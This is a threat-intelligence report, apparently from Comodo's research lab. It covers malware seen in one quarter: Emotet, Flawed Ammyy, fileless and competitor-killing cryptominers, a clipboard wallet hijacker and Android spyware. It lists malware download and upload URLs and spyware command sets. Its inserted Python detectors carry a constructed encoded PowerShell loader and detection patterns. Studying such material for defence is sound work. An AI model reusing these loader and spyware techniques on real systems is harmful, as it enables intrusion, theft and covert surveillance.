Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


The purpose of the VBScript is to launch PowerShell.


The malware downloads itself to a temporary folder and executes binaries located at:

• hxxp://www.iyilikleralemi.com/GtXvlc
• hxxp://www.thecyberconxion.com/PUqUUe
• hxxp://EliasWessel.com/vu6xGmS
• hxxp://mossbeachmusic.de/XuBBN6r
• hxxp://airmaxx.rs/wIdY

At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1: 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service "lanesviewer" to ensure persistence.

The malware creates the "lanesviewer" service to ensure persistence


After that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning, because it infects computers with popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on a legitimate software product called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus, every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As you can see on the diagram, Ammyy Admin was used in spreading many types of nefarious malware.

The newest version of the malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as remote desktop control, a file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. What is especially worth noticing is the fact that these tricks are also based on using legitimate software, from Microsoft this time.


Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.

The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.

Malware runs PowerShell
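An IQY file is plain text, which is what makes it practical to inspect at the mail gateway before Excel ever sees it. The Python below is an added example, not code from the report or from Microsoft: it parses a Web Query file into its header, URL and option lines, then returns the reasons a gateway would have to block it, such as a cleartext fetch or a host outside an allow-list. Both sample files and the trusted host name are constructed for the example, and the placeholder host stands in for the attacker's download site named in the text.

```python
from urllib.parse import urlparse

# Two constructed .iqy files. The first is the shape of a legitimate internal
# query; the second follows the phishing attachment described above, with a
# placeholder host standing in for the attacker's download site.
BENIGN_IQY = (
    "WEB\r\n1\r\nhttps://reports.intranet.example/sales.htm\r\n\r\n"
    "Selection=AllTables\r\nFormatting=None\r\n"
)
SUSPICIOUS_IQY = (
    "WEB\r\n1\r\nhttp://placeholder.example.com/q?u=1\r\n\r\n"
    "Selection=AllTables\r\n"
)

# Assumed allow-list of hosts that Excel is permitted to query here.
TRUSTED_HOSTS = {"reports.intranet.example"}


def parse_iqy(text):
    """Parse a Web Query file: line 1 is the literal WEB, line 2 the format
    version, line 3 the URL, and later key=value lines are query options.
    Returns None if the text does not start with the WEB header."""
    lines = [line.strip() for line in text.splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None
    params = {}
    for line in lines[3:]:
        if "=" in line:
            key, value = line.split("=", 1)
            params[key.strip()] = value.strip()
    return {"version": lines[1], "url": lines[2], "params": params}


def assess_iqy(text, trusted_hosts=TRUSTED_HOSTS):
    """Return the list of reasons to block the attachment; an empty list
    means nothing suspicious was found."""
    parsed = parse_iqy(text)
    if parsed is None:
        return ["not a WEB query file"]
    url = urlparse(parsed["url"])
    reasons = []
    if url.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {url.scheme!r}")
    elif url.scheme == "http":
        reasons.append("cleartext http fetch")
    if url.hostname not in trusted_hosts:
        reasons.append(f"untrusted host {url.hostname!r}")
    return reasons


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_IQY), ("suspicious", SUSPICIOUS_IQY)):
        print(name, assess_iqy(body) or "ok")
```

The allow-list is the decisive check: an IQY that points anywhere other than a known internal reporting host has no business arriving by e-mail, whatever its other options say.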


Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.

2.4 The growth of Flawed Ammyy attacks for Q2


2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors to covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases, attacks can only be discovered too late, after money is withdrawn from a bank account or confidential data is published, etc. Merging trojans as payloads and phishing emails as the means of delivery, as observed during Q2, will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures per the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.

Chart: The growth of Flawed Ammyy attacks for Q2. Monthly detection counts, in order: 43,188; 46,382; 48,881 (x-axis: Apr, May, Jun; y-axis: 40,000 to 50,000).


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean that their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new dangerous abilities.

Earlier cryptomining examples were only able to use the infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware represents malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below, you see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.

BadShell at work


The malicious code in the registry
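The report shows the decoded PowerShell arguments only as screenshots. As an added example, which is neither BadShell's code nor Comodo's tooling, the Python below performs the decoding step a responder applies to the command line of a suspicious scheduled task: it pulls out the -EncodedCommand argument, decodes it from base64 and UTF-16LE, and checks the result for the traits the text names (a registry read, a base64 decode of the stored blob, and an in-memory load), plus a hidden window on the outer command line. The command line and the inner script are constructed stand-ins with a placeholder registry path, built inside the block so the example runs offline.

```python
import base64
import re

# Constructed stand-in for the inner script of such a task. It reads a blob from
# a PLACEHOLDER registry path and hands it to a loader, which is the pattern the
# section describes; it is not BadShell's real script.
SAMPLE_SCRIPT = (
    "$blob = (Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\PLACEHOLDER' -Name 'data').data; "
    "$bytes = [Convert]::FromBase64String($blob); "
    "[Reflection.Assembly]::Load($bytes) | Out-Null"
)


def encode_command(script):
    """Build an -EncodedCommand argument the way powershell.exe expects it:
    UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line as it would appear in a scheduled task or process log.
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand "
    + encode_command(SAMPLE_SCRIPT)
)

# powershell.exe accepts abbreviated forms of the flag, so match all of them.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Traits worth raising on. They are checked on the decoded script and on the
# outer command line with the base64 blob removed, so random base64 characters
# cannot produce a false match.
INDICATORS = {
    "registry_read": re.compile(r"Get-ItemProperty|HKLM:|HKCU:|Registry::", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "in_memory_load": re.compile(r"Reflection\.Assembly\]::Load|Invoke-Expression|\bIEX\b", re.I),
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
}


def decode_encoded_command(cmdline):
    """Return the decoded script carried by -EncodedCommand, or None."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Decode the command and return the sorted indicator names that match."""
    script = decode_encoded_command(cmdline) or ""
    text = ENC_FLAG.sub("", cmdline) + "\n" + script
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
    print(triage(SAMPLE_CMDLINE))
```

The same three-part pattern (registry read, decode, load) is what to look for in Task Scheduler actions and in process-creation telemetry; a registry value large enough to hold a binary, referenced from a PowerShell task, is the persistence the text describes.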


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature will terminate its processes.

CoinMiner kills its rivals as follows

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way, CoinMiner undividedly occupies the victim's computer to use its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing user detection. In Q2 these cryptominers learned to hide. CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking websites' code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe:

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we can find the familiar link to CoinHive:

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
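Checking "the webpage code" by eye misses the encoded form described above, but the decoding can be automated. The Python below is an added example, not the report's or CoinHive's code: it recovers fragments hidden inside atob() and unescape() wrappers in a page's scripts, parses every iframe in the original page and in the decoded fragments, and reports those that point at the CoinHive hosts named in this section or that are sized 1x1. The page fragment is constructed for the example (the hidden iframe is encoded at import time from its plain form so the block stays readable) and the path after cnhv.co is a placeholder.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import quote, unquote, urlparse

# Hosts tied to the in-browser miner discussed above; cnhv.co is the CoinHive
# short-link service named in the text.
MINER_HOSTS = {"coinhive.com", "cnhv.co"}

# Constructed page fragment. On a real page only the encoded strings are
# visible; here the hidden iframe is encoded from its plain form at import time.
HIDDEN_IFRAME = ('<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1" '
                 'style="border:0"></iframe>')
SAMPLE_HTML = (
    "<html><body><p>Welcome</p>\n"
    "<script>document.write(atob('"
    + base64.b64encode(HIDDEN_IFRAME.encode()).decode() + "'));</script>\n"
    "<script>document.write(unescape('" + quote(HIDDEN_IFRAME, safe="") + "'));</script>\n"
    '<iframe src="https://www.youtube.com/embed/x" width="560" height="315"></iframe>\n'
    "</body></html>"
)

ATOB = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
UNESCAPE = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)")


def decode_layers(html):
    """Return the page itself plus every fragment recovered from atob() and
    unescape() wrappers found in its scripts."""
    fragments = [html]
    for m in ATOB.finditer(html):
        try:
            fragments.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
        except ValueError:
            continue  # not valid base64; nothing to recover
    for m in UNESCAPE.finditer(html):
        fragments.append(unquote(m.group(1)))
    return fragments


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def find_hidden_miner_iframes(html):
    """Return (src, reason) for iframes that point at a miner host or are
    sized 1x1 or smaller, looking through the decoded layers as well."""
    hits = []
    for fragment in decode_layers(html):
        collector = IframeCollector()
        collector.feed(fragment)
        for attrs in collector.iframes:
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            tiny = (attrs.get("width", "").strip() in ("0", "1")
                    and attrs.get("height", "").strip() in ("0", "1"))
            if host in MINER_HOSTS:
                hits.append((src, "known miner host"))
            elif tiny:
                hits.append((src, "1x1 iframe"))
    return hits


if __name__ == "__main__":
    for src, reason in find_hidden_miner_iframes(SAMPLE_HTML):
        print(reason, src)
```

The 1x1 rule is the more durable of the two: a host list goes stale as soon as a new shortener is used, whereas an invisible iframe that loads a third-party page has no legitimate reason to exist and deserves a look regardless of where it points.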

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember it or fill it in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers. But cybercriminals copied the program and added the malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack
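Because the swap happens between the user's copy and the wallet's paste, an endpoint agent that records clipboard writes together with the writing process can catch it. The Python below is an added example, not the hijacker's code and not Comodo's detection logic: it classifies clipboard contents by address shape and flags a wallet address that is replaced by a different address of the same kind, from another process, within a short window. The event log is constructed; the two addresses are the ones quoted in this section, the process names are illustrative, and the address patterns cover only Bitcoin's legacy, P2SH and bech32 forms.

```python
import re

# Address shapes handled here: legacy and P2SH Bitcoin (Base58, starting with
# 1 or 3) and native segwit (bech32, starting with bc1). Other coins would
# need their own patterns.
ADDRESS_PATTERNS = {
    "btc_base58": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{25,62}$"),
}

# Constructed clipboard event log as an endpoint agent might record it:
# (timestamp_ms, event, value, source process). The two addresses are the ones
# quoted in the section above; the process names are illustrative.
SAMPLE_EVENTS = [
    (1000, "set", "meeting notes", "notepad.exe"),
    (5000, "set", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs", "chrome.exe"),
    (5040, "set", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm", "svchost.exe"),
    (9000, "get", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm", "wallet.exe"),
]


def address_kind(text):
    """Return which address pattern `text` matches, or None."""
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text.strip()):
            return kind
    return None


def detect_clipboard_swaps(events, max_gap_ms=500):
    """Flag a clipboard write that replaces a wallet address with a different
    address of the same kind, from another process, within max_gap_ms.

    A user re-copying an address from the same application is not flagged,
    nor is a replacement with something that is not an address at all.
    """
    alerts = []
    last = None  # (ts, value, kind, source) of the latest address-shaped write
    for ts, event, value, source in events:
        if event != "set":
            continue
        kind = address_kind(value)
        if kind is not None and last is not None:
            prev_ts, prev_value, prev_kind, prev_source = last
            if (prev_kind == kind and prev_value != value
                    and prev_source != source and ts - prev_ts <= max_gap_ms):
                alerts.append({
                    "at": ts,
                    "original": prev_value,
                    "replacement": value,
                    "by": source,
                })
        last = (ts, value, kind, source) if kind is not None else None
    return alerts


if __name__ == "__main__":
    for alert in detect_clipboard_swaps(SAMPLE_EVENTS):
        print(f"{alert['by']} replaced {alert['original']} with {alert['replacement']}")
```

The process attribution is what turns a curiosity into an alert: a second address-shaped write from a process that has no user interface, a few tens of milliseconds after the user's copy, is the hijacker's signature. The same check, without the timing, is the one a user can do by hand, comparing the pasted address against the copied one before confirming a transfer.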

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

• Version 1: Naver Defender
• Version 2: Netease Defender
• Version 3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details and contacts: id, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server http://cgalim.com/admin/hr/pu/pu.php?do=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version 3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware to the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

• Version 1: Dardesh (Google Play Services Instant Apps)
• Version 2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

• Version 1: Telegram Groups, انتخاب دھم
• Version 2: Postrall, Yes For Referendum, انتخاب دھم
• Version 3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
• Version 4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the applications installed
• Collect browser data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of previous versions, it includes some additional tricks:

• Extracts photos, audio and videos
• Records the screen
• Executes shell commands
• Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

• Takes control over the Bluetooth adapter
• Extracts data about accounts, contact details and installed apps
• Extracts data from the WhatsApp message DB and related keys
• Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3 FaceBook Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set the ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: comwooribankpibsmart, comkbstarkbbank, comibkneobanking, comscdanbscbankapp, comshinhansbanking, comhanabankebkchannelandroidhananbank, nhsmart, comepostpsfsdsi, comkftckjbsmb, comsmgspbs

Extract contact details

Set Wi-Fi to always turned on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy. The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

Figure: Disguises of Stalker Spy (App / Distribution)
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot. The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Figure: Disguises of Mystery Bot
Version 1: Adobe Flash Player
Version 2: Flash Player

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:


Send_SMS - extract SMS content and send it to the C&C server

Send_USSD - send the USSD to the C&C server

Gethistory - monitor browser history

Start_AllApp - gather info about installed applications

Send_call - set the Intent action to call

Forward_call - forward incoming calls

ResForward_call - reset call forwarding

Go_Smsmnd - delete SMS content

Go_GetAlls - get SMS history

Dell_sms - delete SMS content in a conversation

Send_spam - send spam SMS

Start_Inject - call the injectors class

4.1.7 FakeSpy. FakeSpy also has many masks, as you can see in the screenshot.

Figure: Disguises of FakeSpy
佐川急便 현대캐피탈

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information


4.1.8 RedAlert. RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Figure: Disguises of RedAlert
Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2: Update Google Market Flash Player Tactic FlashLight

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

depostbankfinanzassistent

plmbank

aibibankandroid

The second version can block access to some websites, including Google Chrome, Google Play Store, Gmail and YouTube.

4.1.9 Hero Rat. The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Figure: Disguises of Hero Rat
Version 1: CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره Proxy دوست یاب Telegram Ton شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Its code is available on a Telegram hacking channel. Noticeably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay. The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Figure: Disguises of Sonvpay
Version 1: Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot Reccoder-Call QRCodeBar Scanner APK Let me love you ringtone Iphone Ringtone Night light Beauty camera-Photo editor Shape of you ringtone


Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named in the figure.

4.1.11 CoinHive. And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see in the figure. But one of the vectors is especially interesting.

Figure: Disguises of CoinHive
Version-1: Netflix Hack Instagram Hack
Version-2: TSF Launcher
